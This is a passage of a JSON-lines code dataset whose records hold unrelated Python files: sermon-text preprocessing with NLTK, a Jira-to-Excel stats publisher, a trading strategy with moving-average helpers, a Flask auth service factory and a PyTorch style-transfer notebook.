"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 875, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 879, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 879, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 897, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 897, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 898, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 898, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 899, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 899, "usage_type": "name"}]} +{"seq_id": "621469175", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 26 14:45:22 2018\n\n@author: sum410\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCleans multiple documents of sermon corpus\nCreated on Wed Sep 26 13:22:46 2018\n@author: sum410\n\"\"\"\n\nimport os\nimport glob\nimport string\nimport nltk\n#nltk.download()\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nimport re\nimport pickle\n\nos.chdir('C:/Users/sum410/Dropbox/PoliticsOfSermons/Data/SampleLDA')\n\n# Empty list and read in files as elements again\n# Read in sample sermon data\nfile_list = glob.glob(os.path.join(os.getcwd(),\n \"C:/Users/sum410/Dropbox/PoliticsOfSermons/Data/MasterList\", \"*.txt\"))\nsample_serms = []\nfor file_path in file_list[0:1000]:\n with open(file_path, encoding=\"utf8\") as f_input:\n sample_serms.append(f_input.read()) # 3 sermons in list\n\n# Apply word_tokenize to each element of the list called incoming_reports\ntokenized_serms = [word_tokenize(doc) for doc in sample_serms]\n\n## Remove punctuation\nregex = re.compile('[%s]' % re.escape(string.punctuation))\ntokenized_serms_no_punctuation = []\nfor serm in tokenized_serms:\n new_serm = []\n for token in serm: \n new_token = regex.sub(u'', token)\n if not new_token == u'':\n new_serm.append(new_token)\n \n tokenized_serms_no_punctuation.append(new_serm)\n\nprint(len(tokenized_serms_no_punctuation))\n\n## Remove stop words\ntokenized_serms_no_stopwords = []\nfor serm in tokenized_serms_no_punctuation:\n new_term_vector = []\n for word in serm:\n if not word in stopwords.words('english'):\n new_term_vector.append(word)\n tokenized_serms_no_stopwords.append(new_term_vector)\n \nprint(len(tokenized_serms_no_stopwords))\n\n## Remove numbers\nnonstemmed_docs = []\nfor serm in tokenized_serms_no_stopwords:\n no_num_vector = []\n for word in serm:\n word = ''.join([i for i in word if not i.isdigit()])\n if word != '':\n no_num_vector.append(word)\n nonstemmed_docs.append(no_num_vector)\n \n#nonstemmed_docs = list(filter(None, nonstemmed_docs))\nprint(len(nonstemmed_docs))\n\n## Stem words\nporter = PorterStemmer()\nstemmed_docs = []\nfor doc in nonstemmed_docs:\n final_doc = []\n for word in doc:\n final_doc.append(porter.stem(word))\n stemmed_docs.append(final_doc)\n \nprint(len(stemmed_docs))\n\n# Delete intermediate lists\ndel tokenized_serms_no_punctuation, tokenized_serms_no_stopwords\n\n# Save stemmed and non-stemmed docs \nwith open('saved_preprocess.pkl', 'wb') as f: \n pickle.dump([nonstemmed_docs, stemmed_docs], f)\n", "sub_path": "Exploratory/preprocess2[wip].py", "file_name": "preprocess2[wip].py", "file_ext": "py", "file_size_in_byte": 2611, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 26, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 30, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 38, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 41, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 41, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 41, "usage_type": "attribute"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 59, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 59, "usage_type": "name"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 79, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "509302414", "text": "\"\"\"\nJira Stats Publisher.\n\nTakes a report config detailing which reports to publish and\na Jira Wrapper which provides the data for the reports\n\"\"\"\n\nimport os\nimport pandas as pd\nimport logging\n\nfrom xlsxwriter.utility import xl_rowcol_to_cell\n\n_state_default_colours = ['#8dd3c7',\n '#ffffb3',\n '#bebada',\n '#fb8072',\n '#80b1d3',\n '#fdb462',\n '#b3de69',\n '#fccde5',\n '#d9d9d9',\n '#bc80bd',\n '#ccebc5',\n '#ffed6f']\n\n\ndef publish(config, jira, from_date, to_date):\n\n writer = None\n\n if config['format'] == 'xlsx':\n excel_basename = config['name']\n excel_filename = os.path.join(config['location'],\n excel_basename + '.xlsx')\n writer = pd.ExcelWriter(excel_filename, engine='xlsxwriter')\n\n for report in config['reports']:\n\n data = None\n\n if report['metric'] == 'history':\n data = jira.history(from_date, to_date)\n\n if data is not None:\n if isinstance(writer, pd.ExcelWriter):\n\n sheet_name = []\n\n sheet_name.append(report['metric'])\n\n worksheet_name = worksheet_title('-'.join(sheet_name))\n\n data.to_excel(writer, worksheet_name)\n\n\n if report['metric'] == 'history':\n if 'format' in report:\n formats = report['format']\n else:\n formats = format_states(config['states'])\n workbook = writer.book\n sheets = [sheet for sheet in workbook.worksheets() if sheet.name[-7:] == 'history']\n # Do the colouring in\n for sheet in sheets:\n colour_cfd(workbook, sheet, data, formats)\n\n if isinstance(writer, pd.ExcelWriter):\n writer.save()\n\n\ndef format_states(states):\n\n formats = {}\n\n for index, state in enumerate(states):\n try:\n formats[state] = {'color': _state_default_colours[index]}\n except IndexError:\n rebased_index = index\n while rebased_index >= len(_state_default_colours):\n rebased_index = rebased_index - len(_state_default_colours)\n formats[state] = {'color': _state_default_colours[rebased_index]}\n\n return formats\n\n\ndef colour_cfd(workbook, worksheet, data, formats):\n\n workbook_formats = {}\n\n for i, row in enumerate(data.values):\n for j, cell in enumerate(row):\n\n try:\n color = formats[cell]['color']\n if color not in workbook_formats:\n\n new_format = workbook.add_format()\n new_format.set_bg_color(color)\n workbook_formats[color] = new_format\n\n cell_ref = xl_rowcol_to_cell(i+1, j+1)\n worksheet.write(cell_ref, cell, workbook_formats[color])\n except KeyError:\n pass\n\n\ndef worksheet_title(full_title):\n \"\"\"\n Shorten the title if it is not going to fit on the worksheet\n \"\"\"\n\n _MAX_LENGTH = 30\n\n excess = len(full_title) - _MAX_LENGTH\n\n if excess > 0:\n parts = full_title.split('-')\n shorten_by = excess / len(parts)\n\n short_title = full_title\n\n while len(short_title) > _MAX_LENGTH:\n longest = max(parts[:-1], key=len)\n if len(longest) > shorten_by:\n parts[parts.index(longest)] = longest[:-shorten_by]\n\n short_title = ''\n for part in parts[:-1]:\n short_title += part\n short_title += '-'\n\n short_title += parts[-1]\n else:\n short_title = short_title[:_MAX_LENGTH-len(parts[-1])] + parts[-1]\n\n return short_title\n\n else:\n return full_title\n", "sub_path": "jlf_stats/publisher.py", "file_name": "publisher.py", "file_ext": "py", "file_size_in_byte": 4046, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pandas.ExcelWriter", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.ExcelWriter", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pandas.ExcelWriter", "line_number": 68, "usage_type": "attribute"}, {"api_name": "xlsxwriter.utility.xl_rowcol_to_cell", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "144365468", "text": "import analysis as an\nimport backtester as bt\nimport exchange_API as API\nimport portfolio as pf\nimport database as db\n\nimport logging\n\n\n\ndef strategy_update(df, index, strategy):\n\n import numpy as np\n\n # ignore 1st index, apply strategies after that\n if index != 0:\n\n # iterating through technicals and updating them into the df\n for techkey, techvalue in strategy['technicals'].items():\n techvalue['type'](df, index, techkey, techvalue)\n\n # iterating through buy conditions and updating them into the df\n if check_strategy_conditions(df, index, strategy['buy']):\n df.at[index, 'order'] = 'buy'\n df.at[index, 'order_qty'] = df.at[index-1, 'instrument_1_qty'] / df.at[index, 'close']\n\n # iterating through sell conditions and updating them into the df\n if check_strategy_conditions(df, index, strategy['sell']):\n df.at[index, 'order'] = 'sell'\n df.at[index, 'order_qty'] = df.at[index-1, 'instrument_2_qty']\n\n logging.debug('Strategy updated. Index {}'.format(index))\n\n else:\n df.at[index, 'order'] = 'none'\n df.at[index, 'order_qty'] = 0\n\ndef check_strategy_conditions(df, index, value):\n if type(value['a']) == dict:\n a = check_strategy_conditions(df, index, value['a'])\n elif type(value['a']) == str:\n a = df.at[index, value['a']]\n else:\n a = value['a']\n\n if type(value['b']) == dict:\n b = check_strategy_conditions(df, index, value['b'])\n elif type(value['b']) == str:\n b = df.at[index, value['b']]\n else:\n b = value['b']\n\n result = value['op'](a, b)\n\n return result\n\n\n\ndef sma(df, index, name, values):\n \"\"\"\n Performs a simple moving average on the close price of the primary dataframe\n\n Parameters\n ----------\n df : primary dataframe\n index : index of the primary dataframe to write the SMA to\n window : The number of rows working backward from the index to apply the SMA to\n\n Returns\n -------\n The results get written to the primary dataframe in the index row\n \"\"\"\n\n df.at[index, name] = df['close'].rolling(values['window'],\n min_periods=values['window']).mean()[index]\n\n logging.debug('SMA written to primary dataframe. Index {}'.format(index))\n\n\n\ndef ema(df, index, name, values):\n \"\"\"\n Performs an exponential moving average on the close price of the primary dataframe\n\n Parameters\n ----------\n df : primary dataframe\n index : index of the primary dataframe to write the SMA to\n window : The number of rows working backward from the index to apply the EMA to\n\n Returns\n -------\n The results get written to the primary dataframe in the index row\n\n \"\"\"\n\n df.at[index, name] = df['close'].ewm(span=values['window'],\n min_periods=values['window']).mean()[index]\n\n logging.debug('EMA written to primary dataframe. Index {}'.format(index))\n\n\n\ndef bollinger(df, index, name, values):\n\n # values['window']\n # values['K']\n\n # sma(df, index, name, {'window' : values['window']})\n\n pass\n", "sub_path": "cralgo/strategy.py", "file_name": "strategy.py", "file_ext": "py", "file_size_in_byte": 3102, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.debug", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "204871382", "text": "import logging.config\n\nfrom auth_service.database import db, migrate\nfrom auth_service.extensions import cors, ma\nfrom flask import Flask\n\nfrom .config import config\nfrom auth_service.oauth2 import config_oauth\n\n\ndef create_app(config_name=\"default\", settings_override=None):\n init_logging()\n\n app = Flask(__name__)\n app_config = config[config_name]\n app.config.from_object(app_config)\n app_config.init_app(app)\n\n init_db(app)\n init_extensions(app)\n\n if settings_override:\n app.config.update(settings_override)\n\n init_blueprint(app)\n config_oauth(app)\n\n return app\n\n\ndef init_logging():\n LOGGING = {\n \"version\": 1,\n \"formatters\": {\n \"brief\": {\"format\": \"%(message)s\"},\n \"default\": {\n \"format\": \"%(asctime)s %(levelname)-8s %(name)-15s %(message)s\",\n \"datefmt\": \"%Y-%m-%d %H:%M:%S\",\n },\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"level\": \"DEBUG\",\n \"formatter\": \"default\",\n \"stream\": \"ext://sys.stdout\",\n },\n \"none\": {\"class\": \"logging.NullHandler\"},\n },\n \"loggers\": {\n \"amqp\": {\"handlers\": [\"none\"], \"propagate\": False},\n \"conf\": {\"handlers\": [\"none\"], \"propagate\": False},\n \"\": {\n \"handlers\": [\n \"console\",\n ],\n \"level\": \"DEBUG\",\n \"propagate\": False,\n },\n },\n }\n\n logging.config.dictConfig(LOGGING)\n\n\ndef init_db(app):\n db.init_app(app)\n migrate.init_app(app, db)\n\n\ndef init_extensions(app):\n cors.init_app(\n app,\n resources={\n r\"/*\": {\"origins\": \"*\"},\n },\n )\n ma.init_app(app)\n\n\ndef init_blueprint(app):\n from auth_service.api import api as api_bp\n from auth_service.oauth import oauth2 as oauth_bp\n from auth_service.swagger import swagger_bp\n\n app.register_blueprint(api_bp, url_prefix=\"/api\")\n app.register_blueprint(oauth_bp, url_prefix=\"/oauth\")\n app.register_blueprint(swagger_bp, url_prefix=\"/swagger\")\n", "sub_path": "auth_service/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "config.config", "line_number": 15, "usage_type": "name"}, {"api_name": "auth_service.oauth2.config_oauth", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.config.config.dictConfig", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.config.config", "line_number": 63, "usage_type": "attribute"}, {"api_name": "logging.config", "line_number": 63, "usage_type": "name"}, {"api_name": "auth_service.database.db.init_app", "line_number": 67, "usage_type": "call"}, {"api_name": "auth_service.database.db", "line_number": 67, "usage_type": "name"}, {"api_name": "auth_service.database.migrate.init_app", "line_number": 68, "usage_type": "call"}, {"api_name": "auth_service.database.db", "line_number": 68, "usage_type": "argument"}, {"api_name": "auth_service.database.migrate", "line_number": 68, "usage_type": "name"}, {"api_name": "auth_service.extensions.cors.init_app", "line_number": 72, "usage_type": "call"}, {"api_name": "auth_service.extensions.cors", "line_number": 72, "usage_type": "name"}, {"api_name": "auth_service.extensions.ma.init_app", "line_number": 78, "usage_type": "call"}, {"api_name": "auth_service.extensions.ma", "line_number": 78, "usage_type": "name"}, {"api_name": "auth_service.api.api", "line_number": 86, "usage_type": "argument"}, {"api_name": "auth_service.oauth.oauth2", "line_number": 87, "usage_type": "argument"}, {"api_name": "auth_service.swagger.swagger_bp", "line_number": 88, "usage_type": "argument"}]} +{"seq_id": "280040740", "text": "# To add a new cell, type '#%%'\n# To add a new markdown cell, type '#%% [markdown]'\n#%% Change working directory from the workspace root to the ipynb file location. Turn this addition off with the DataScience.changeDirOnImportExport setting\n# ms-python.python added\nimport os\ntry:\n\tos.chdir(os.path.join(os.getcwd(), 'lab5'))\n\tprint(os.getcwd())\nexcept:\n\tpass\n#%% [markdown]\n# # Style Transfer\n# To start off, you might ask, what is Style transfer?\n# It's a way of adding the *style* of one image, say a painting to the *content* of another image, like a photo.\n# \n# Let's start by importing some libraries:\n# \n# \n# * Import torch, torch.nn for working with PyTorch\n# * Import numpy for numbers\n# * Import PIL and matplotlib to load and display images\n# * Import torchvision to train or load pre-trained models\n# * Import copy to models\n# * Import files from google.colab, so that we can upload images from the local drive.\n# \n# \n# \n\n#%%\nfrom __future__ import print_function\n\nimport copy\nimport os\nimport io\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nimport torchvision.models as models\n\nimport numpy as np\nimport PIL\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\nfrom google.colab import files \n\nfrom tensorflow.python.layers import base\n\n\n#%%\n# If we have cuda then use it!\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# desired size of the output image, use small size if no gpu\nimsize = (1024, 1024) if torch.cuda.is_available() else (128, 160)\n\n# Define the transforms to be performed on images\nloader = transforms.Compose([\n transforms.Resize(imsize), # scale imported image\n transforms.ToTensor()]) # transform it into a torch tensor\n\n\ndef image_loader(image_name):\n \n # load the image from the notebook filesystem\n image = Image.open(image_name)\n \n # fake batch dimension required to fit network's input dimensions\n image = loader(image).unsqueeze(0)\n \n # convert the image to a tensor of floats on the gpu and return\n return image.to(device, torch.float)\n\n\ndef imshow(tensors, title=None):\n unloader = transforms.ToPILImage() # reconvert into PIL image \n num = len(tensors)\n f, axs = plt.subplots(1,num, figsize=(8*num, 8))\n \n for i in range(len(tensors)):\n image = tensors[i].cpu().clone() # we clone the tensor to not make changes to the original\n image = image.squeeze(0) # remove the batch dimension\n image = unloader(image) # transform the image from a tensor to a PIL image so we can show it.\n\n p = plt.subplot(1,num,i+1)\n p.imshow(image)\n p.axis('off')\n \n if title is not None: # Display the title if there is one.\n plt.title(title[i]) \n\n plt.show()\n plt.pause(0.001) # pause a bit so that plots are updated\n\n#%% [markdown]\n# # Importing files\n# \n# Use the interactive cells below to upload a style image and a content image. Bigger images are better. We need to change the sizes of our images, to make sure that the style and content images are the same size. If they don't match, we could run into some very avoidable problems later.\n# \n\n#%%\nprint('Upload Content Image')\nfile_dict = files.upload()\n\n# this is a trick to get the name of the last uploaded file and pass it to image_loader()\ncontent_img = image_loader(io.BytesIO(file_dict[next(iter(file_dict))]))\n\n# clone the content image so we don't have re upload if something goes wrong.\ninput_img = content_img.clone()\n\n# if you want to use white noise instead uncomment the below line:\n#input_img = torch.randn(content_img.data.size(), device=device)\n\n\n#%%\nprint('\\nUpload Style Image')\nfile_dict = files.upload()\n\n# this is a trick to get the name of the last uploaded file and pass it to image_loader()\nstyle_img = image_loader(io.BytesIO(file_dict[next(iter(file_dict))]))\n\n# our network can't handle images that aren't the same size.\nassert style_img.size() == content_img.size(), \"we need to import style and content images of the same size\"\n\n#%% [markdown]\n# #Take a look!\n# \n# Here is where we take our images and convert them back from tensors into PIL images.\n# \n# We also clone the tensors so that we don't make changes to the original\n# \n# Last of all, we print the images with matplotlib, to make sure the sizes are working.\n\n#%%\nimshow([style_img, content_img], title=['Style Image', 'Content Image'])\n\n#%% [markdown]\n# #Loss Functions\n# \n# Here we define our loss functions and our matrix that will be \"scrubbing\" our image.\n# \n# Matrix dementions are as follows:\n# * A - Batch size\n# * B - Number of feature maps\n# * C - Dimensions of an f.map (N=C*D)\n# * D - The 2nd part of that f.map\n\n#%%\ndef gram_matrix(input):\n # b = batch size (i.e., 1)\n # f = number of feature maps\n # (h,w) = dimensions of a f. map (N=c*d) \n b, f, h, w = input.size() \n\n # resize the input so we can get the gram matrix\n features = input.view(b * f, h * w)\n \n # calculate the ortho-normal basis\n basis = torch.mm(features, features.t())\n\n # 'normalize' by dividing by the number of elements in each feature map\n gram = basis.div(b * f * h * w)\n \n return gram\n\nclass StyleLoss(nn.Module):\n def __init__(self, target_feature):\n super(StyleLoss, self).__init__()\n \n # detach to endsure we don't back prop into our gram matrix\n self.target = gram_matrix(target_feature).detach()\n\n def forward(self, input):\n G = gram_matrix(input)\n \n # mean squared error between the gram matricies of our style image and the input image\n self.loss = F.mse_loss(G, self.target)\n\n return input\n\n \nclass ContentLoss(nn.Module):\n def __init__(self, target):\n super(ContentLoss, self).__init__()\n\n # we 'detach' the target content from the tree used\n # to dynamically compute the gradient: this is a stated value,\n # not a variable. Otherwise the forward method of the criterion\n # will throw an error.\n self.target = target.detach()\n\n def forward(self, input):\n self.loss = F.mse_loss(input, self.target)\n return input\n\n#%% [markdown]\n# # Normalization\n# \n# Normalization of the individual values of the input image will be the first \"layer\" in our DNN.\n\n#%%\ncnn_normalization_mean = torch.tensor([0.485, 0.456, 0.406]).to(device)\ncnn_normalization_std = torch.tensor([0.229, 0.224, 0.225]).to(device)\n\n# create a module to normalize input image so we can easily put it in a\n# nn.Sequential\nclass Normalization(nn.Module):\n def __init__(self, mean, std):\n super(Normalization, self).__init__()\n\n # .view the mean and std to make them [C x 1 x 1] so that they can\n # directly work with image Tensor of shape [B x C x H x W].\n # B is batch size. C is number of channels. H is height and W is width.\n self.mean = torch.tensor(mean).view(-1, 1, 1)\n self.std = torch.tensor(std).view(-1, 1, 1)\n\n def forward(self, img):\n # normalize img\n return (img - self.mean) / self.std\n\n#%% [markdown]\n# #VGG\n# \n# Because Pytorch has pretrained models already, we're not going to bother training our own. Our model of choice is VGG19 model. See the architecture below. Interestingly, we aren't going to use the whole model, we are going to break it up in a way you might not expect.\n# \n# \n# \n# \n\n#%%\nvgg = models.vgg19(pretrained=True).features.to(device).eval()\n\n#%% [markdown]\n# # The network\n# \n# Here is where we're finally are defining our network.\n# \n# For this, we're using 5 Convolutional(Conv) layers, 5 Rectified Linear Unit (Relu) layer, one Max pooling layer, and a normalizing layer.\n# \n# You'll notice that we're using 5 convolutions on our style image, but only one on our content image. This is because building an accurate feature map of our style image is much more important, so that we can accurately place style features on the content without disrupting the original image too much. It also helps us add texture from the style image onto the content image.\n# \n\n#%%\n# desired depth layers to compute style/content losses\ncontent_layers_default = ['conv_4']\nstyle_layers_default = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\n\ndef get_style_model_and_losses(vgg, normalization_mean, normalization_std,\n style_img, content_img,\n content_layers=content_layers_default,\n style_layers=style_layers_default):\n\n # deep copy before butchering\n vgg = copy.deepcopy(vgg)\n\n # normalization module\n normalization = Normalization(normalization_mean, normalization_std).to(device)\n \n\n # just in order to have an iterable access to or list of content/syle\n # losses\n content_losses = []\n style_losses = []\n\n # vgg is a nn.Sequential, so we make a new nn.Sequential\n # to put in modules that are supposed to be activated sequentially\n model = nn.Sequential(normalization)\n\n i = 0 # increment every time we see a conv\n for layer in vgg.children():\n if isinstance(layer, nn.Conv2d):\n i += 1 # increment every time we see a conv\n\n name = 'conv_{}'.format(i)\n elif isinstance(layer, nn.ReLU):\n name = 'relu_{}'.format(i)\n\n # The in-place version doesn't play very nicely with the ContentLoss\n # and StyleLoss we insert below. So we replace with out-of-place ones here.\n layer = nn.ReLU(inplace=False)\n elif isinstance(layer, nn.MaxPool2d):\n name = 'pool_{}'.format(i)\n elif isinstance(layer, nn.BatchNorm2d):\n name = 'bn_{}'.format(i)\n else:\n raise RuntimeError('Unrecognized layer: {}'.format(layer.__class__.__name__))\n\n # Add the current vgg layer to our new model\n model.add_module(name, layer)\n\n if name in content_layers:\n \n # get the activations for the content image at this point in the network\n target = model(content_img).detach()\n \n # set up a loss function inside a model layer\n content_loss = ContentLoss(target)\n \n # this layer calculates loss on the activations then\n # passes the activations through unchanged\n model.add_module(\"content_loss_{}\".format(i), content_loss)\n\n # We will need to be able to access the the loss for this layer outside the model\n content_losses.append(content_loss)\n\n if name in style_layers:\n\n # get the activations for the style image at this point in the network\n target = model(style_img).detach()\n\n # set up a loss function inside a model layer\n style_loss = StyleLoss(target)\n\n # this layer calculates loss on the activations then\n # passes the activations through unchanged\n model.add_module(\"style_loss_{}\".format(i), style_loss)\n\n # We will need to be able to access the the loss for this layer outside the model\n style_losses.append(style_loss)\n\n # now we trim off the layers after the last content and style losses\n j = 0\n for j in range(len(model) - 1, -1, -1):\n if isinstance(model[j], ContentLoss) or isinstance(model[j], StyleLoss):\n break\n\n model = model[:(j + 1)]\n\n return model, style_losses, content_losses\n\n#%% [markdown]\n# #Neural Network\n# \n# Here we are all the way at the end!\n# \n# Here you get to finally run both the content and style images through the network we've built, in order to analyze and record relevant data about them. We will then modify our cloned image (or white noise if you decided to do that) into a combination of the style from the style image, and the content from the content image.\n# \n# You can decide the number of epochs you'd like to run to try to get the perfect number of loss (under 5 is great, but be careful not to do too many epochs, otherwise it will flip and you'll get like 30,000 loss) by modifying the num_steps variable in the run_style_transfer() function. You can also adjust the weights (you'll notice that style is at one million currently and content is at 1).\n# \n# This will run through as many epochs as you set, and report the loss at every multiple of 50.\n# \n# Congratulations, and have fun!\n\n#%%\ndef get_input_optimizer(input_img):\n # this line to show that input is a parameter that requires a gradient\n optimizer = optim.LBFGS([input_img.requires_grad_()])\n return optimizer\n\ndef run_style_transfer(vgg, normalization_mean, normalization_std,\n content_img, style_img, input_img, num_steps=300,\n style_weight=1000000, content_weight=1):\n \"\"\"Run the style transfer.\"\"\"\n\n print('Building the style transfer model..')\n model, style_losses, content_losses = get_style_model_and_losses(\n vgg, normalization_mean, normalization_std, style_img, content_img\n )\n \n print(\"Get the optimizer..\")\n optimizer = get_input_optimizer(input_img)\n\n print('Optimizing..')\n run = [0]\n while run[0] <= num_steps:\n\n def closure():\n # correct the values of updated input image\n input_img.data.clamp_(0, 1)\n\n optimizer.zero_grad()\n model(input_img)\n style_score = 0\n content_score = 0\n\n for sl in style_losses:\n style_score += sl.loss\n \n for cl in content_losses:\n content_score += cl.loss\n\n style_score *= style_weight\n content_score *= content_weight\n\n loss = style_score + content_score\n loss.backward()\n\n run[0] += 1\n if run[0] % 50 == 0:\n print(\"epoch {}:\".format(run[0]))\n print('Style Loss : {:4f} Content Loss: {:4f}'.format(\n style_score.item(), content_score.item()))\n print()\n\n return style_score + content_score\n\n optimizer.step(closure)\n\n # a last correction...\n input_img.data.clamp_(0, 1)\n\n return input_img\n\n\n\n#%%\n# Set up all done. let's run this thing.\noutput = run_style_transfer(vgg, cnn_normalization_mean, cnn_normalization_std,\n content_img, style_img, input_img)\n\n\n#%%\nimshow([output, content_img, style_img] , title=['Output','Content', 'Style'])\n\n\n", "sub_path": "lab5/style_transfer.py", "file_name": "style_transfer.py", "file_ext": "py", "file_size_in_byte": 14675, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.chdir", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 61, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 61, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 62, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 62, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 63, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.float", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.ToPILImage", "line_number": 79, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "google.colab.files.upload", "line_number": 106, "usage_type": "call"}, {"api_name": "google.colab.files", "line_number": 106, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 109, "usage_type": "call"}, {"api_name": "google.colab.files.upload", "line_number": 120, "usage_type": "call"}, {"api_name": "google.colab.files", "line_number": 120, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 169, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 180, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 185, "usage_type": "name"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 196, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 196, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 210, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 210, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 218, "usage_type": "call"}, {"api_name": "torchvision.models.vgg19", "line_number": 234, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 234, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 258, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 271, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 275, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 275, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 279, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 279, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 284, 